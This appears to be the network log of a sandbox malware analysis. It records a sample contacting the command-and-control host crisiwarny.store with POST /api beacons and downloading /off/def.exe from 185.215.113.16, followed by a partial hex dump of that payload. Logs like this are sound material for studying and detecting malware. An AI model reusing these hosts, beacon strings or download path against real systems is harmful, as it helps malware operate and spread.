                                                                                                    Oct 28, 2024 07:18:48.505112886 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505136013 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.505160093 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.505214930 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505281925 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.505650043 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505709887 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:49.238532066 CET4971780192.168.2.8185.215.113.16
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 28, 2024 07:18:25.610274076 CET5648453192.168.2.81.1.1.1
                                                                                                    Oct 28, 2024 07:18:25.619409084 CET53564841.1.1.1192.168.2.8
                                                                                                    Oct 28, 2024 07:18:25.625129938 CET6505453192.168.2.81.1.1.1
                                                                                                    Oct 28, 2024 07:18:25.637160063 CET53650541.1.1.1192.168.2.8
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 28, 2024 07:18:25.610274076 CET192.168.2.81.1.1.10x2fc2Standard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                                    Oct 28, 2024 07:18:25.625129938 CET192.168.2.81.1.1.10x5566Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 28, 2024 07:18:25.619409084 CET1.1.1.1192.168.2.80x2fc2Name error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 28, 2024 07:18:25.637160063 CET1.1.1.1192.168.2.80x5566No error (0)crisiwarny.store104.21.95.91A (IP address)IN (0x0001)false
                                                                                                    Oct 28, 2024 07:18:25.637160063 CET1.1.1.1192.168.2.80x5566No error (0)crisiwarny.store172.67.170.64A (IP address)IN (0x0001)false
                                                                                                    • crisiwarny.store
                                                                                                    • 185.215.113.16
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.849717185.215.113.16804936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 28, 2024 07:18:41.241487980 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Host: 185.215.113.16
                                                                                                    Oct 28, 2024 07:18:42.153733969 CET1236INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 28 Oct 2024 06:18:42 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 2869760
                                                                                                    Last-Modified: Mon, 28 Oct 2024 06:09:16 GMT
                                                                                                    Connection: keep-alive
                                                                                                    ETag: "671f2a8c-2bca00"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2c 00 00 04 00 00 ab 54 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                    Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@, `@ ,T,`Ui` @ @.rsrc`2@.idata 8@aisygwgx+j+:@pdrbgaqy ,+@.taggant@@,"+@
                                                                                                    Oct 28, 2024 07:18:42.153748989 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Oct 28, 2024 07:18:42.153759956 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Oct 28, 2024 07:18:42.153883934 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Oct 28, 2024 07:18:42.153896093 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Oct 28, 2024 07:18:42.153908968 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Oct 28, 2024 07:18:42.153920889 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Oct 28, 2024 07:18:42.153933048 CET848INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Oct 28, 2024 07:18:42.153949976 CET1236INData Raw: 57 7a 32 61 61 7b 5f c3 4d a2 61 8e 4b b8 43 57 c0 7a 45 58 42 39 4b 84 20 19 6e 95 60 85 48 73 83 ec 4e 5e 1f 87 2a 9b 6b ec fc a4 69 99 3b 34 8e 1f bc 22 84 8d 5e 74 82 7f 46 8a 87 80 41 38 c2 78 f6 ad 73 8e 42 81 72 eb f7 d3 b3 84 3d 5b 62 91
                                                                                                    Data Ascii: Wz2aa{_MaKCWzEXB9K n`HsN^*ki;4"^tFA8xsBr=[bG|K\j]$}}GCS-~|ZM`C~[KE]OuOlLpA\nEmDI8~d=DE\ZCJv6yU lR+5Wge8RYBPihkUQdLGB
                                                                                                    Oct 28, 2024 07:18:42.153964996 CET1236INData Raw: fa 12 e6 a6 94 7f a2 5c 85 c1 03 6e 50 a1 b8 a6 1d af 48 61 cb e5 50 61 a7 a2 0a 62 4d 1b 69 5a d3 b2 ff 95 a7 c2 69 a5 5c d2 43 b5 cc 8e f8 bd 95 85 a8 f8 49 f2 69 d5 e7 c7 d0 aa 4d 85 00 61 d8 02 3e 7e ec e5 a6 2d fc 05 61 61 6e b1 42 80 7b 5a
                                                                                                    Data Ascii: \nPHaPabMiZi\CIiMa>~-aanB{Zv{oLA=IbiC j/9K5_<l#2\Vu=(^OkPPO\!}[_xqPYUwumOv|n["mPInh
                                                                                                    Oct 28, 2024 07:18:42.159328938 CET1236INData Raw: 9e d9 9f 34 ac 8c 9f 0c 92 58 0c ce 80 5b a6 65 8f 21 a8 68 95 c6 af b9 2b f0 68 8e 97 f2 7e 4d 4d 93 bb 7c 4d c9 a7 c9 b3 24 4b aa 99 d4 78 60 9c 8d 88 5a b8 eb fe 48 ca 04 6b 3d c8 93 7c c1 a5 00 ab 70 49 ba 34 83 61 7f 11 ca 68 fc 78 c1 b3 4d
                                                                                                    Data Ascii: 4X[e!h+h~MM|M$Kx`ZHk=|pI4ahxMAVR.[bKlc[3BKC@@BoksV^p}u[lT[ibmK]|]=Ra:[~[0jw-Mgyi^S6u


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.849705104.21.95.914434936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-28 06:18:26 UTC263OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 8
                                                                                                    Host: crisiwarny.store
                                                                                                    2024-10-28 06:18:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                    Data Ascii: act=life
                                                                                                    2024-10-28 06:18:26 UTC1015INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 28 Oct 2024 06:18:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=8jdlbk75id3666bt6nf2966f3v; expires=Fri, 21 Feb 2025 00:05:05 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xw6vNO5sjLaWrUQeKNTZIepC6LSS5nzroS%2Bl1jPhm4z4TidEg56Q%2FgAVVNn3t8T%2BZsMooZ%2F%2FVy4bhT0xWPnR%2BA9vrpAzoYp4bKZDAcZopD9n5iGX7Z7%2BF3RIG1vAeS6fTA89"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d98cefafe0b4740-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=2443881&cwnd=251&unsent_bytes=0&cid=6f5432083d21d55a&ts=577&x=0"
                                                                                                    2024-10-28 06:18:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                    Data Ascii: 2ok
                                                                                                    2024-10-28 06:18:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.849706104.21.95.914434936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-28 06:18:27 UTC264OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 52
                                                                                                    Host: crisiwarny.store
                                                                                                    2024-10-28 06:18:27 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                    2024-10-28 06:18:28 UTC1011INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 28 Oct 2024 06:18:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=kgqs40s07ckad65aek93b37o7a; expires=Fri, 21 Feb 2025 00:05:06 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unbxS%2B0L8eYDaUUgLST%2FbW%2BJorPkihV1M9DsuxxEkUs8WxTspUqHsqYqOk6fJ338ROqRFBNHMzQLZKjtXQJIu5xTFVPNrndJyK%2F3qyoCebGvoSTRwz%2FeoeNGo4NqLQkvsKk2"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d98cf027e536c14-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1160&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=2383539&cwnd=251&unsent_bytes=0&cid=cc21e95a96d4c2c1&ts=546&x=0"
                                                                                                    2024-10-28 06:18:28 UTC358INData Raw: 34 64 63 0d 0a 4a 36 57 42 50 34 6a 6f 2f 70 48 4b 75 4a 37 6c 43 58 6c 72 66 54 7a 35 50 59 54 38 51 69 35 65 68 63 39 68 57 34 62 4a 4d 74 56 63 68 2f 63 64 73 74 7a 53 73 37 6e 64 76 4e 39 39 43 78 34 59 45 4e 74 63 34 4e 35 34 53 44 2f 70 76 41 52 33 70 4c 39 66 39 78 33 44 34 46 50 37 6a 64 4b 7a 72 38 43 38 33 31 49 43 53 52 68 53 32 77 65 6d 6d 53 68 4d 50 2b 6d 74 41 44 44 70 75 56 36 32 54 38 6e 6d 56 2b 32 4c 6d 76 43 6d 31 66 75 41 62 42 67 42 45 31 57 55 56 65 6e 65 62 67 77 37 2f 2b 31 62 65 63 75 73 52 72 52 71 78 50 4a 55 71 70 58 53 36 75 6a 64 38 4d 63 7a 57 77 6f 59 58 70 56 62 34 4a 63 71 52 6a 62 68 72 41 55 78 39 71 42 55 76 55 2f 48 35 56 62 6e 67 6f 37 39 72 4e 4c 77 68 6d 59 59 53 56 45 65 6e 45 65 6d 78 6d 41 66 44 75 53 38 45 69
                                                                                                    Data Ascii: 4dcJ6WBP4jo/pHKuJ7lCXlrfTz5PYT8Qi5ehc9hW4bJMtVch/cdstzSs7ndvN99Cx4YENtc4N54SD/pvAR3pL9f9x3D4FP7jdKzr8C831ICSRhS2wemmShMP+mtADDpuV62T8nmV+2LmvCm1fuAbBgBE1WUVenebgw7/+1becusRrRqxPJUqpXS6ujd8MczWwoYXpVb4JcqRjbhrAUx9qBUvU/H5Vbngo79rNLwhmYYSVEenEemxmAfDuS8Ei
                                                                                                    2024-10-28 06:18:28 UTC893INData Raw: 4e 48 33 67 6e 6b 51 41 42 4a 54 6d 31 4c 73 6b 53 4e 4d 4f 2b 32 6e 44 44 50 67 70 6c 32 78 52 63 65 6a 45 36 71 4e 68 4c 50 77 6d 74 2b 43 65 78 77 46 43 52 79 68 48 2f 6e 51 4f 51 77 37 36 2b 31 62 65 65 79 75 55 37 52 4f 79 4f 42 56 34 5a 69 63 34 61 37 58 2b 5a 56 74 48 67 63 56 58 59 6c 56 36 4a 67 6a 52 54 66 75 71 41 51 39 70 4f 55 51 73 46 32 48 75 78 33 4c 68 35 66 2f 6f 73 33 38 78 33 52 56 45 46 39 5a 6c 78 2b 2b 33 69 52 4e 4f 4f 61 70 44 54 66 67 70 31 61 35 53 4d 6a 6c 56 2b 71 4e 6c 76 75 67 32 2f 47 4d 5a 42 73 4d 45 6c 71 64 55 2b 65 62 59 41 4a 38 34 4c 56 44 59 61 53 46 56 37 52 58 68 64 5a 65 35 49 53 62 35 65 6a 46 73 70 34 72 48 41 56 66 42 74 74 52 34 35 45 79 54 53 37 69 6f 78 45 31 34 61 31 64 74 45 76 48 35 6c 72 6e 68 4a 72 30
                                                                                                    Data Ascii: NH3gnkQABJTm1LskSNMO+2nDDPgpl2xRcejE6qNhLPwmt+CexwFCRyhH/nQOQw76+1beeyuU7ROyOBV4Zic4a7X+ZVtHgcVXYlV6JgjRTfuqAQ9pOUQsF2Hux3Lh5f/os38x3RVEF9Zlx++3iRNOOapDTfgp1a5SMjlV+qNlvug2/GMZBsMElqdU+ebYAJ84LVDYaSFV7RXhdZe5ISb5ejFsp4rHAVfBttR45EyTS7ioxE14a1dtEvH5lrnhJr0
                                                                                                    2024-10-28 06:18:28 UTC1369INData Raw: 33 66 39 30 0d 0a 68 35 50 36 6f 64 50 75 6a 57 63 56 47 78 4a 55 6e 6c 48 71 6d 79 39 4d 50 65 61 6a 43 54 4b 6b 35 52 43 77 58 59 65 37 48 63 57 48 6a 4f 47 69 30 65 33 46 58 68 67 48 45 56 6d 4e 48 2f 6e 51 4f 51 77 37 36 2b 31 62 65 65 2b 74 58 4c 74 46 77 66 46 54 35 5a 69 57 34 61 7a 55 2b 49 74 6c 45 67 51 51 57 34 6c 62 35 6f 77 68 53 54 76 70 6f 42 45 38 70 4f 55 51 73 46 32 48 75 78 33 51 76 70 76 6a 75 64 32 2b 73 6d 67 56 42 78 68 49 32 30 43 6f 68 32 42 4c 4d 4b 66 31 51 7a 72 6f 70 6c 6d 79 53 74 58 70 55 65 75 59 6d 2f 71 68 30 50 32 4a 5a 42 41 46 47 6b 79 51 55 4f 36 52 49 55 45 78 37 4b 6b 44 65 61 72 72 56 36 38 46 6e 36 4e 38 35 34 57 4f 38 4c 6d 59 79 59 52 6c 46 51 34 4a 48 6f 51 52 2f 39 34 6e 51 48 79 2f 37 51 49 31 36 4b 70 66 73
                                                                                                    Data Ascii: 3f90h5P6odPujWcVGxJUnlHqmy9MPeajCTKk5RCwXYe7HcWHjOGi0e3FXhgHEVmNH/nQOQw76+1bee+tXLtFwfFT5ZiW4azU+ItlEgQQW4lb5owhSTvpoBE8pOUQsF2Hux3Qvpvjud2+smgVBxhI20Coh2BLMKf1QzroplmyStXpUeuYm/qh0P2JZBAFGkyQUO6RIUEx7KkDearrV68Fn6N854WO8LmYyYRlFQ4JHoQR/94nQHy/7QI16Kpfs
                                                                                                    2024-10-28 06:18:28 UTC1369INData Raw: 57 34 59 36 59 38 36 58 52 38 6f 6c 69 46 77 45 54 57 59 6c 53 34 35 59 71 52 54 6e 72 6f 41 41 72 35 36 6f 51 2b 51 58 41 2b 78 32 79 79 72 76 41 6e 2f 6d 38 6d 43 55 43 53 52 68 53 32 77 65 6d 6e 79 68 4c 4d 75 4f 2f 44 53 76 71 72 46 43 78 54 63 2f 6b 55 65 53 45 6a 76 75 70 32 76 4b 49 59 78 49 4e 48 6c 71 66 55 2b 48 65 62 67 77 37 2f 2b 31 62 65 63 79 6f 53 71 30 48 36 65 68 64 37 5a 71 4b 36 4f 6a 46 73 70 34 72 48 41 56 66 42 74 74 62 37 5a 51 70 54 7a 58 6a 6f 41 4d 77 36 36 4a 59 75 6b 33 56 34 6c 66 34 6a 70 6e 79 70 39 44 34 6a 32 63 55 42 52 74 4d 6b 42 2b 6f 33 69 64 55 66 4c 2f 74 49 7a 4c 79 69 45 4b 6c 42 64 69 74 52 4b 71 4e 6b 4c 50 77 6d 76 57 4c 61 68 6f 44 47 56 57 65 55 75 61 62 4b 6b 73 77 35 36 30 41 50 2b 4b 6d 57 4c 39 4a 79 2b
                                                                                                    Data Ascii: W4Y6Y86XR8oliFwETWYlS45YqRTnroAAr56oQ+QXA+x2yyrvAn/m8mCUCSRhS2wemnyhLMuO/DSvqrFCxTc/kUeSEjvup2vKIYxINHlqfU+Hebgw7/+1becyoSq0H6ehd7ZqK6OjFsp4rHAVfBttb7ZQpTzXjoAMw66JYuk3V4lf4jpnyp9D4j2cUBRtMkB+o3idUfL/tIzLyiEKlBditRKqNkLPwmvWLahoDGVWeUuabKksw560AP+KmWL9Jy+
                                                                                                    2024-10-28 06:18:28 UTC1369INData Raw: 6c 50 69 75 31 50 32 42 5a 78 5a 4a 55 52 36 63 52 36 62 47 59 47 73 6d 36 71 73 55 4b 4e 47 73 55 4f 59 46 32 4b 31 45 71 6f 32 51 73 2f 43 61 38 59 74 68 46 67 77 62 56 70 78 63 35 35 49 6b 51 54 48 6a 70 41 63 38 39 72 6c 57 75 55 58 49 37 56 4c 6d 6d 4a 4c 32 71 4e 61 38 79 53 73 63 45 56 38 47 32 32 37 78 6e 6d 42 54 63 76 37 74 42 44 57 6b 38 78 43 34 53 4e 58 76 55 75 71 4c 6e 2f 65 6a 33 66 71 42 61 68 67 4d 48 46 75 64 58 75 61 53 4b 6b 73 30 37 61 4d 4f 50 2b 43 74 56 76 63 4c 68 2b 52 46 71 74 4c 63 77 61 58 55 39 59 52 74 46 68 38 33 62 39 74 41 71 49 64 67 53 7a 43 6e 39 55 4d 39 37 36 4e 63 73 6b 33 43 34 6c 58 67 67 70 50 38 75 74 76 7a 6a 6d 77 51 42 42 42 51 6e 6c 48 30 6d 53 74 48 4e 4f 36 6a 42 58 6d 71 36 31 65 76 42 5a 2b 6a 61 2b 6d
                                                                                                    Data Ascii: lPiu1P2BZxZJUR6cR6bGYGsm6qsUKNGsUOYF2K1Eqo2Qs/Ca8YthFgwbVpxc55IkQTHjpAc89rlWuUXI7VLmmJL2qNa8ySscEV8G227xnmBTcv7tBDWk8xC4SNXvUuqLn/ej3fqBahgMHFudXuaSKks07aMOP+CtVvcLh+RFqtLcwaXU9YRtFh83b9tAqIdgSzCn9UM976Ncsk3C4lXggpP8utvzjmwQBBBQnlH0mStHNO6jBXmq61evBZ+ja+m
                                                                                                    2024-10-28 06:18:28 UTC1369INData Raw: 4e 37 79 6c 57 6f 55 53 56 45 65 6e 45 65 6d 78 6d 42 39 4b 75 43 71 44 48 76 4e 72 45 75 32 54 38 54 6f 55 61 71 56 30 75 72 6f 33 66 44 48 4d 31 73 45 45 31 4f 66 54 65 71 65 49 45 55 37 37 62 38 4d 4e 75 6d 6f 55 4c 4a 58 78 76 46 53 34 59 2b 66 39 36 66 56 38 49 39 68 57 30 64 66 57 59 4d 66 76 74 34 4d 54 79 33 74 37 79 51 6a 38 71 78 63 70 6b 37 4b 37 78 33 31 78 49 57 7a 72 39 61 38 33 79 73 62 43 42 4a 4d 6e 6c 37 73 6c 43 31 45 4d 2b 4b 6f 44 44 33 67 6f 46 36 6c 53 38 6a 6a 57 2b 47 4c 6d 66 43 6a 30 50 4b 4f 65 56 74 48 58 31 6d 44 48 37 37 65 43 6c 63 39 36 71 46 42 46 2b 2b 39 56 2f 56 6b 79 65 68 61 35 70 7a 63 37 4f 62 44 76 49 42 6e 57 31 46 66 56 35 56 54 35 5a 6b 6f 52 44 6e 6e 70 67 4d 32 37 71 56 58 70 55 2f 4c 36 55 2f 6c 69 5a 48 33
                                                                                                    Data Ascii: N7ylWoUSVEenEemxmB9KuCqDHvNrEu2T8ToUaqV0uro3fDHM1sEE1OfTeqeIEU77b8MNumoULJXxvFS4Y+f96fV8I9hW0dfWYMfvt4MTy3t7yQj8qxcpk7K7x31xIWzr9a83ysbCBJMnl7slC1EM+KoDD3goF6lS8jjW+GLmfCj0PKOeVtHX1mDH77eClc96qFBF++9V/Vkyeha5pzc7ObDvIBnW1FfV5VT5ZkoRDnnpgM27qVXpU/L6U/liZH3
                                                                                                    2024-10-28 06:18:28 UTC1369INData Raw: 34 72 48 41 56 66 42 74 74 66 34 70 49 6a 53 7a 4c 6f 6f 41 77 2b 37 36 52 61 75 56 66 49 35 6c 58 6d 67 70 48 68 6f 74 44 75 6a 6d 49 57 42 78 64 4d 6d 42 2b 6f 33 69 64 55 66 4c 2f 74 4d 54 50 6e 70 30 61 36 53 6f 66 38 45 2f 50 4b 6d 2f 2f 6f 67 72 79 56 65 52 73 43 48 31 6d 56 54 65 65 57 4c 30 59 38 34 61 59 4a 4f 75 32 76 58 72 35 44 78 75 35 63 36 34 71 5a 38 36 48 49 38 63 63 6c 57 77 34 48 48 73 4d 66 30 5a 49 72 66 54 2f 78 37 52 78 33 2f 65 74 58 75 77 57 66 6f 31 7a 34 68 35 54 33 71 4e 66 36 6a 47 6f 61 43 68 39 65 6d 46 2f 6a 6c 53 39 4b 4f 2b 71 6e 43 6a 44 32 6f 31 53 6c 52 63 76 6e 48 61 54 4b 6d 2b 76 6f 67 72 79 33 61 42 41 46 48 31 4f 4f 48 2f 6e 51 4f 51 77 37 36 2b 31 62 65 65 79 67 57 37 46 4f 78 4f 42 54 34 59 43 54 2f 4b 4c 63 2b
                                                                                                    Data Ascii: 4rHAVfBttf4pIjSzLooAw+76RauVfI5lXmgpHhotDujmIWBxdMmB+o3idUfL/tMTPnp0a6Sof8E/PKm//ogryVeRsCH1mVTeeWL0Y84aYJOu2vXr5Dxu5c64qZ86HI8cclWw4HHsMf0ZIrfT/x7Rx3/etXuwWfo1z4h5T3qNf6jGoaCh9emF/jlS9KO+qnCjD2o1SlRcvnHaTKm+vogry3aBAFH1OOH/nQOQw76+1beeygW7FOxOBT4YCT/KLc+
                                                                                                    2024-10-28 06:18:28 UTC1369INData Raw: 45 46 46 4c 5a 58 75 75 4f 4a 77 78 79 70 36 74 44 59 62 54 6c 45 4c 4e 55 68 37 73 4e 75 4e 48 4a 6f 50 2b 4b 72 70 67 6c 41 6b 6b 4a 48 73 4d 4e 71 4e 34 79 44 47 53 6e 36 67 41 72 39 71 31 54 6f 55 61 41 33 57 50 4b 67 5a 44 77 70 4e 76 37 78 79 56 62 42 6c 38 47 6f 68 2f 6c 6a 44 49 44 4c 66 47 67 45 7a 36 6f 6f 30 47 36 53 59 65 74 48 61 61 4f 6c 2f 2b 74 33 65 7a 49 65 51 73 43 45 30 6a 58 57 2f 54 65 62 67 77 74 37 4b 49 52 4e 2b 50 6b 51 61 46 49 31 2b 42 59 37 63 61 55 34 71 58 57 76 4d 6b 72 44 67 49 54 57 4a 5a 4b 71 59 38 32 54 79 72 67 34 51 73 6f 36 61 63 51 69 41 75 48 2b 78 32 79 79 71 6e 77 70 74 54 37 6b 58 70 57 4b 52 52 53 6d 46 50 6e 6d 57 41 43 66 4f 48 74 57 32 71 71 36 31 53 6d 42 5a 2b 7a 44 37 48 66 7a 36 54 34 69 4f 50 4a 63 6c
                                                                                                    Data Ascii: EFFLZXuuOJwxyp6tDYbTlELNUh7sNuNHJoP+KrpglAkkJHsMNqN4yDGSn6gAr9q1ToUaA3WPKgZDwpNv7xyVbBl8Goh/ljDIDLfGgEz6oo0G6SYetHaaOl/+t3ezIeQsCE0jXW/Tebgwt7KIRN+PkQaFI1+BY7caU4qXWvMkrDgITWJZKqY82Tyrg4Qso6acQiAuH+x2yyqnwptT7kXpWKRRSmFPnmWACfOHtW2qq61SmBZ+zD7Hfz6T4iOPJcl
